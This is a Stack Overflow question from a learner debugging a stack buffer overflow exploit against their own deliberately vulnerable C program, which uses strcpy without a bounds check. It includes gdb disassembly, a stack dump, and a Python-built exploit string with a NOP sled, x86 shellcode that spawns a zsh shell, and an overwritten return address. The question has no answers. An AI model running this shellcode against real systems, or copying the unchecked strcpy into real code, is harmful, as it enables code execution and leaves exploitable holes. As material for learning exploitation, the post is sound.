Stack Buffer Overflow

2
#include <stdio.h>
#include <string.h>

int main (int argc, char **argv){
    char buffer[500];
    strcpy(buffer,argv[1]);
    return 0;
}

This is the code I have been working with to exploit the system. What I've been trying to do is overflow the buffer past the base pointer and into the return address and then point back to a spot in the buffer to execute some NOP lines until it hits my shellcode that executes a zsh command line. I've been using this in gdb to just try to get the program to open the zsh command line. So for the format of my string to be entered I use python to generate the string. Before that I used gdb to determine how big my stack buffer is which gave me this:

0x0804843b <+0>:    lea    0x4(%esp),%ecx
0x0804843f <+4>:    and    $0xfffffff0,%esp
0x08048442 <+7>:    pushl  -0x4(%ecx)
0x08048445 <+10>:   push   %ebp
0x08048446 <+11>:   mov    %esp,%ebp
0x08048448 <+13>:   push   %ecx
0x08048449 <+14>:   sub    $0x204,%esp
0x0804844f <+20>:   mov    %ecx,%eax
0x08048451 <+22>:   mov    0x4(%eax),%eax
0x08048454 <+25>:   add    $0x4,%eax
0x08048457 <+28>:   mov    (%eax),%eax
0x08048459 <+30>:   sub    $0x8,%esp
0x0804845c <+33>:   push   %eax
0x0804845d <+34>:   lea    -0x1fc(%ebp),%eax
0x08048463 <+40>:   push   %eax
0x08048464 <+41>:   call   0x8048310 <strcpy@plt>
0x08048469 <+46>:   add    $0x10,%esp
0x0804846c <+49>:   mov    0x4(%ebp),%eax
0x0804846f <+52>:   sub    $0x8,%esp
0x08048472 <+55>:   push   %eax
0x08048473 <+56>:   push   $0x8048510
0x08048478 <+61>:   call   0x8048300 <printf@plt>
0x0804847d <+66>:   add    $0x10,%esp
0x08048480 <+69>:   mov    $0x0,%eax
0x08048485 <+74>:   mov    -0x4(%ebp),%ecx
0x08048488 <+77>:   leave  
0x08048489 <+78>:   lea    -0x4(%ecx),%esp
0x0804848c <+81>:   ret

The first sub call is telling me that the buffer is 0x204 in hex long or 516 in decimal. I'm not 100% sure what its 516 not 500 because it is a char but not the point. My shellcode that I planed on implementing is 43 bytes and my return address I decided to do 10 times over. So my string is formatted like this:

$(python -c 'print ("\x90" * 457) +"\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80"')

I just need to add in the return address at this point. I did so by using gdb again to pick a point in my memory where a NOP call was and I just chose in the middle in case of any kind of shift. To do this I printed out 164 places in memory after the $esp.

(gdb) x/164x $esp
0xffffcc40: 0x00000070  0xf7fefe66  0xf7fe922d  0x90909090
0xffffcc50: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcc60: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcc70: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcc80: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcc90: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcca0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffccb0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffccc0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffccd0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcce0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffccf0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcd00: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcd10: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcd20: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcd30: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcd40: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcd50: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcd60: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcd70: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcd80: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcd90: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcda0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcdb0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcdc0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcdd0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcde0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcdf0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffce00: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffce10: 0x90909090  0x83c03190  0x048801ec  0x7a2f6824
0xffffce20: 0x2f686873  0x686e6962  0x7273752f  0x5650e689
0xffffce30: 0xf3890bb0  0xd231e189  0x01b080cd  0x80cddb31
0xffffce40: 0xf7f95300  0xffffce60  0x00000000  0xf7dfd637
0xffffce50: 0xf7f95000  0xf7f95000  0x00000000  0xf7dfd637
0xffffce60: 0x00000002  0xffffcef4  0xffffcf00  0x00000000
0xffffce70: 0x00000000  0x00000000  0xf7f95000  0xf7ffdc04
0xffffce80: 0xf7ffd000  0x00000000  0xf7f95000  0xf7f95000
0xffffce90: 0x00000000  0x2efe3324  0x6ec91d34  0x00000000
0xffffcea0: 0x00000000  0x00000000  0x00000002  0x08048340
0xffffceb0: 0x00000000  0xf7fedee0  0xf7fe8770  0xf7ffd000
0xffffcec0: 0x00000002  0x08048340  0x00000000  0x08048361

So my new string should look like this:

$(python -c 'print ("\x90" * 457) +"\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80"+("\x30\xcd\xff\xff"*10)')

Now that I've shown you the process of how I've gotten this far I can ask the my question. Why doesn't this work I should be replacing everything up to the return address and then causing the address to point back to my NOP calls and then open up my command line but instead it tells me 

Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()

Any insight would be helpful I have been working on this issue for quite some time now and just don't know where to go from here.

c
buffer-overflow
asked on Stack Overflow Mar 21, 2017 by Iceechill

0 Answers

Nobody has answered this question yet.

User contributions licensed under CC BY-SA 3.0